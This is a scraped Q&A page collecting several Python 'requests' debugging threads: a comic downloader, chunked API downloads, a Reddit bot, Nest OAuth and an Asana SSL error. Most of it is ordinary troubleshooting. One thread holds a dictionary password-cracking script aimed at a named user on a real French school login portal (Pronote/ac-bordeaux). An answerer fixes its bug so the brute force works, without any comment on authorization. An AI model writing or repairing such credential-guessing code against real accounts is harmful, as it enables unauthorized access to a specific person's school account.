Download with Python from URL gives No Host Supplied error

Download with Python from URL gives No Host Supplied error - python

I am trying to make app that download comics but whenever I try to download an image, it says no host supplied.
I really searched and there was nothing.
This is the code:
import requests,bs4
url='https://www.marvel.com/comics/issue/71314/edge_of_spider-geddon_2018_1'
res=requests.get(url,stream=True)
res.raise_for_status()
soup=bs4.BeautifulSoup(res.text)
elem=soup.select('div[class="row-item-image"] img')#.viewer-cnt .row .col-xs-12 #ppp img')
#print(elem)
comicurl='https:'+elem[0].get('src')
res=requests.get(comicurl,stream=True,allow_redirects=True)
res.raise_for_status()
with open(comicurl[comicurl.rfind('/')+1:],'wb') as i:
for chunk in res.iter_content(100000):
i.write(chunk)
I expect it to download the image but it gives me this error:
Traceback (most recent call last):
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\comicdownloader.py", line 10, in <module>
res=requests.get(comicurl,stream=True,allow_redirects=True)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\sessions.py", line 519, in request
prep = self.prepare_request(req)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\sessions.py", line 462, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\models.py", line 313, in prepare
self.prepare_url(url, params)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\models.py", line 390, in prepare_url
raise InvalidURL("Invalid URL %r: No host supplied" % url)
requests.exceptions.InvalidURL: Invalid URL 'https:https://i.annihil.us/u/prod/marvel/i/mg/6/b0/5b6c5e4154f75/portrait_uncanny.jpg': No host supplied
And it gives it to me whenever I try it on any website.

it looks like elem[0].get('src') evaluates to https://i.annihil.us/u/prod/marvel/i/mg/6/b0/5b6c5e4154f75/portrait_uncanny.jpg.
so on line comicurl='https:'+elem[0].get('src') you add http: in front of an already well formed url, making it invalid

Can't argue with this: Invalid URL 'https:https://i.annihil.us/u/prod -- the URL is really invalid, probably you should get rid of https in the following statement:
comicurl='https:'+elem[0].get('src')

Related

Failed to parse: <Response [200]>

Please help me i don't know how to use requests
This is the code :
import requests
url = requests.get("https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html")
arq = open('word.txt','r').readlines()
for line in arq:
password = line.strip()
http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})
content = http.content
if "Identifiant ou mot de passe incorrect" in content:
print("[-]Invalide : "+password)
else:
print("================== [+] MOT DE PASSE CRACKÉ : "+password+"===========")
break
and i got this :
Traceback (most recent call last): File "F:\Program Files
(x86)\py\lib\site-packages\requests\models.py", line 382, in
prepare_url
scheme, auth, host, port, path, query, fragment = parse_url(url) File "F:\Program Files
(x86)\py\lib\site-packages\urllib3\util\url.py", line 394, in
parse_url
return six.raise_from(LocationParseError(source_url), None) File "", line 3, in raise_from
urllib3.exceptions.LocationParseError: Failed to parse: <Response
[200]>
During handling of the above exception, another exception occurred:
Traceback (most recent call last): File "F:/Program Files
(x86)/py/Hack pronote/Pronote v3/Pronote.py", line 8, in
http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'}) File "F:\Program Files
(x86)\py\lib\site-packages\requests\api.py", line 119, in post
return request('post', url, data=data, json=json, **kwargs) File "F:\Program Files (x86)\py\lib\site-packages\requests\api.py", line
61, in request
return session.request(method=method, url=url, **kwargs) File "F:\Program Files (x86)\py\lib\site-packages\requests\sessions.py",
line 528, in request
prep = self.prepare_request(req) File "F:\Program Files (x86)\py\lib\site-packages\requests\sessions.py", line 456, in
prepare_request
p.prepare( File "F:\Program Files (x86)\py\lib\site-packages\requests\models.py", line 316, in prepare
self.prepare_url(url, params) File "F:\Program Files (x86)\py\lib\site-packages\requests\models.py", line 384, in
prepare_url
raise InvalidURL(*e.args) requests.exceptions.InvalidURL: Failed to parse: <Response [200]>

As said by #Iarsks, this is a problem where you're trying to use the URL variable, but the URL variable is not a string but an object, request object to be specific.
If I understood your code, I and as #Iarsks said, you probably don't understand how requests work cuz, it seems like your trying to declare an URL somehow when it's not needed. To simplify, you only need the URL string like this:
url = "https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html"
with out the requests.get() function.
So you can understand this library better there are two mainly used requests methods GET and POST, there are more, but for the sake of this ill only talk about these two, where GET is when you want to get information from the website, for example, a JSON file from and API, and POST when your want to save or send some new data to and API or webpage.
Anyways I would recommend your reading about the basics of requests and how the backend handles them to understand and see how it all works before starting to use requests on your own.
If I got your problem right, the following code should fix your problem:
import requests
url = "https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html"
arq = open('word.txt','r').readlines()
for line in arq:
password = line.strip()
http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})
content = http.content
if "Identifiant ou mot de passe incorrect" in content:
print("[-]Invalide : "+password)
else:
print("================== [+] MOT DE PASSE CRACKÉ : "+password+"===========")
break

Python Requests OS Error 104 Connection Broken Error

Hi I am trying to a hit an API using requests module of python. The Api has to be hit 20000 times as the number of pages are around 20000. In every hit the data comes around 10 mb. By the end of the process it creates a json file of around 100gb. Here is the code I have written
with open('file.json','wb',buffering=100*1048567) as f:
while(next_page_cursor != ""):
with request.get(url,headers=headers) as response:
json_response = json.loads(response.content.decode('utf-8'))
"""
json response looks something like this
{
content:[{},{},{}........50 dictionaries]
next_page_cursor : "abcd"
}
"""
next_page_cursor = json_response['next_page_cursor']
for data in json_response['content']:
f.write((json.dumps(data) + "\n").encode())
But after running successfully for few pages the code fails giving the below error:
Traceback (most recent call last):
File "<command-1206920060120926>", line 65, in <module>
with requests.get(data_url, headers = headers) as response:
File "/databricks/python/lib/python3.7/site-packages/requests/api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "/databricks/python/lib/python3.7/site-packages/requests/api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "/databricks/python/lib/python3.7/site-packages/requests/sessions.py", line 533, in request
resp = self.send(prep, **send_kwargs)
File "/databricks/python/lib/python3.7/site-packages/requests/sessions.py", line 686, in send
r.content
File "/databricks/python/lib/python3.7/site-packages/requests/models.py", line 828, in content
self._content = b''.join(self.iter_content(CONTENT_CHUNK_SIZE)) or b''
File "/databricks/python/lib/python3.7/site-packages/requests/models.py", line 753, in generate
raise ChunkedEncodingError(e)
requests.exceptions.ChunkedEncodingError: ('Connection broken: OSError("(104, \'ECONNRESET\')")', OSError("(104, 'ECONNRESET')"))

you need to use response.iter_content
https://2.python-requests.org/en/master/api/#requests.Response.iter_content

PRAW raising RequestException when I try to run simple bot

I'm trying to write a redditbot; I decided to start with a simple one, to make sure I was doing things properly, and I got a RequestException.
my code (bot.py):
import praw
for s in praw.Reddit('bot1').subreddit("learnpython").hot(limit=5):
print s.title
my praw.ini file:
# The URL prefix for OAuth-related requests.
oauth_url=https://oauth.reddit.com
# The URL prefix for regular requests.
reddit_url=https://www.reddit.com
# The URL prefix for short URLs.
short_url=https://redd.it
[bot1]
client_id=HIDDEN
client_secret=HIDDEN
password=HIDDEN
username=HIDDEN
user_agent=ILovePythonBot0.1
(where HIDDEN replaces the actual id, secret, password and username.)
my Traceback:
Traceback (most recent call last):
File "bot.py", line 3, in <module>
for s in praw.Reddit('bot1').subreddit("learnpython").hot(limit=5):
File "/usr/local/lib/python2.7/dist-packages/praw/models/listing/generator.py", line 79, in next
return self.__next__()
File "/usr/local/lib/python2.7/dist-packages/praw/models/listing/generator.py", line 52, in __next__
self._next_batch()
File "/usr/local/lib/python2.7/dist-packages/praw/models/listing/generator.py", line 62, in _next_batch
self._listing = self._reddit.get(self.url, params=self.params)
File "/usr/local/lib/python2.7/dist-packages/praw/reddit.py", line 322, in get
data = self.request('GET', path, params=params)
File "/usr/local/lib/python2.7/dist-packages/praw/reddit.py", line 406, in request
params=params)
File "/usr/local/lib/python2.7/dist-packages/prawcore/sessions.py", line 131, in request
params=params, url=url)
File "/usr/local/lib/python2.7/dist-packages/prawcore/sessions.py", line 70, in _request_with_retries
params=params)
File "/usr/local/lib/python2.7/dist-packages/prawcore/rate_limit.py", line 28, in call
response = request_function(*args, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/prawcore/requestor.py", line 48, in request
raise RequestException(exc, args, kwargs)
prawcore.exceptions.RequestException: error with request request() got an unexpected keyword argument 'json'
Any help would be appreciated. PS, I am using Python 2.7., on Ubuntu 14.04. Please ask me for any other information you may need.

The way i see it, it seems you have a problem with your request to Reddit API. Maybe try changing the user-agent in your in-file configuration. According to PRAW basic configuration Options the user-agent should follow a format <platform>:<app ID>:<version string> (by /u/<reddit username>) . Try that see what happens.

Having issues getting firebase data through Oauth pin-auth session for Nest

Base script:
from sanction import Client
# client_id & client_secret are omitted but are valid
client_pin = input('Enter PIN:')
access_token_url = 'https://api.home.nest.com/oauth2/access_token'
c = Client(
token_endpoint=access_token_url,
client_id=client_id,
client_secret=client_secret)
c.request_token(code = client_pin)
[See edits for history]
Running c.request('/devices') returned:
Traceback (most recent call last):
File "C:\py\nest_testing_sanction.py", line 36, in <module>
c.request("/devices")
File "C:\Python34\lib\site-packages\sanction-0.4.1-py3.4.egg\sanction\__init__.py", line 169, in request
File "C:\Python34\lib\site-packages\sanction-0.4.1-py3.4.egg\sanction\__init__.py", line 211, in transport_query
File "C:\Python34\lib\urllib\request.py", line 258, in __init__
self.full_url = url
File "C:\Python34\lib\urllib\request.py", line 284, in full_url
self._parse()
File "C:\Python34\lib\urllib\request.py", line 313, in _parse
raise ValueError("unknown url type: %r" % self.full_url)
ValueError: unknown url type: 'None/devices?access_token=c.[some long session token]'
Given the output it seems like I need to be putting in a generic URL so I tried c.request('wss://developer-api.nest.com'):
Traceback (most recent call last):
File "C:\py\nest_testing_sanction.py", line 36, in <module>
data = c.request(query_url)
File "C:\Python34\lib\site-packages\sanction-0.4.1-py3.4.egg\sanction\__init__.py", line 171, in request
File "C:\Python34\lib\urllib\request.py", line 153, in urlopen
return opener.open(url, data, timeout)
File "C:\Python34\lib\urllib\request.py", line 455, in open
response = self._open(req, data)
File "C:\Python34\lib\urllib\request.py", line 478, in _open
'unknown_open', req)
File "C:\Python34\lib\urllib\request.py", line 433, in _call_chain
result = func(*args)
File "C:\Python34\lib\urllib\request.py", line 1257, in unknown_open
raise URLError('unknown url type: %s' % type)
urllib.error.URLError: <urlopen error unknown url type: nonewss>
I also tried https as per:
- same result
By contrast, this works (for a firebase.io virtual device):
firebase = firebase.FirebaseApplication('https://nesttest.firebaseio.com', None)
thermostat_result = firebase.get('/devices', 'thermostats')

In Python I would use something like sanction to keep things simple. You should be able to get it to work with the Nest API using code like: (untested, using token flow rather than pin flow)
from sanction.client import Client
# instantiating a client to get the auth URI
c = Client(auth_endpoint="https://home.nest.com/login/oauth2",
client_id=config["nest.client_id"])
# instantiating a client to process OAuth2 response
c = Client(token_endpoint="https://api.home.nest.com/oauth2/access_token",
client_id=config["nest.client_id"],
client_secret=config["nest.client_secret"])
The library is well documented, so you should be able to figure it out from here if something is missing.

This is more of a comment, but the system does not let me comment just yet.
To your question about where to put the web pin simply add code = pin to the request_token call.
c.request_token(code = nest_client_pin)
This still does not fully solve the issue as I can only use a PIN once. After I have used it once, every subsequent call will fail again as you describe. Still researching that.

SSL Error occurs on one computer but not the other?

I can't figure out why all of a sudden the below code that uses Asana's API generates the below SSL error. Something must have changed on my laptop, since it runs perfectly on my other computer.
from asana import asana
class Login(object):
def __init__(self):
api = 'API'
self.asana_api = asana.AsanaAPI(api, debug=False)
self.user_id = 7359085011308L
class Test(Login):
def Test(self):
Id = 2467584555313L
print self.asana_api.list_tasks(Id,self.user_id)
Traceback (most recent call last):
File "/Users/Chris/Dropbox/AsanaPullPush.py", line 75, in <module>
if __name__ == "__main__": main()
File "/Users/Chris/Dropbox/AsanaPullPush.py", line 72, in main
print Test().Test()
File "/Users/Chris/Dropbox/AsanaPullPush.py", line 15, in Test
print self.asana_api.list_tasks(Id,self.user_id)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/asana/asana.py", line 174, in list_tasks
return self._asana(target)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/asana/asana.py", line 74, in _asana
r = requests.get(target, auth=(self.apikey, ""))
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/requests/api.py", line 55, in get
return request('get', url, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/requests/api.py", line 44, in request
return session.request(method=method, url=url, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/requests/sessions.py", line 383, in request
resp = self.send(prep, **send_kwargs)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/requests/sessions.py", line 486, in send
r = adapter.send(request, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/requests/adapters.py", line 389, in send
raise SSLError(e)
requests.exceptions.SSLError: [Errno 1] _ssl.c:507: error:0D0890A1:asn1 encoding routines:ASN1_verify:unknown message digest algorithm

We recently changed our SSL key in response to the Heartbleed bug you may have heard about. http://blog.asana.com/2014/04/heartbleed/
It looks like your laptop may not have the right SSL. See https://github.com/pypa/pip/issues/829 for discussion of a similar issue.
You should be able to check SSL version on the two machines with python -c "import ssl; print ssl.OPENSSL_VERSION". If indeed the laptop is behind, you'll need to update your python's SSL.

Develop Reference

Python is a programming language that lets you work quickly and integrate systems more effectively.

Download with Python from URL gives No Host Supplied error - python

it looks like elem[0].get('src') evaluates to https://i.annihil.us/u/prod/marvel/i/mg/6/b0/5b6c5e4154f75/portrait_uncanny.jpg. so on line comicurl='https:'+elem[0].get('src') you add http: in front of an already well formed url, making it invalid

Can't argue with this: Invalid URL 'https:https://i.annihil.us/u/prod -- the URL is really invalid, probably you should get rid of https in the following statement: comicurl='https:'+elem[0].get('src')

Related

Failed to parse: <Response [200]>

Python Requests OS Error 104 Connection Broken Error

PRAW raising RequestException when I try to run simple bot

Having issues getting firebase data through Oauth pin-auth session for Nest

SSL Error occurs on one computer but not the other?

Categories

Resources